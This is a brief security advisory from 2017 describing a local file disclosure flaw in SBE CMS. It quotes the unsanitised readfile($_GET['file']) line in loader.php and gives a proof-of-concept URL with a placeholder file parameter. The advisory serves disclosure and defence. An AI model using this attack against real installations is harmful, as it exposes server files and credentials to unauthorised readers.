SBE CMS < Local File Disclosure

2017.07.05

Shahab Shamsi (IR)

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: N/A

[-] Title : SBE CMS < Local File Disclosure
[-] Author : Shahab Shamsi
[-] Software Link : https://github.com/zackgilbert/SBE-CMS
[-] Version: N/A
[-] Tested on : [ Windows ]
[-] Category : Webapps
[-] Date : 2017 05 July


===========
Vulnerable page :
===========
/loader.php


==========
Vulnerable Code :
==========
Line 110 : readfile($_GET['file']);




==========
POC URL:
==========
http://localhost:8080/SBE-CMS/loader.php?file=[LFD]




=========
Contact Me :
Telegram : @Shahab_Shamsi
Email : info@securityman.org
WebSilte : WwW.iran123.Org

See this note in RAW Version

Vote for this issue:

100%

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

SBE CMS < Local File Disclosure

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

SBE CMS < Local File Disclosure

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.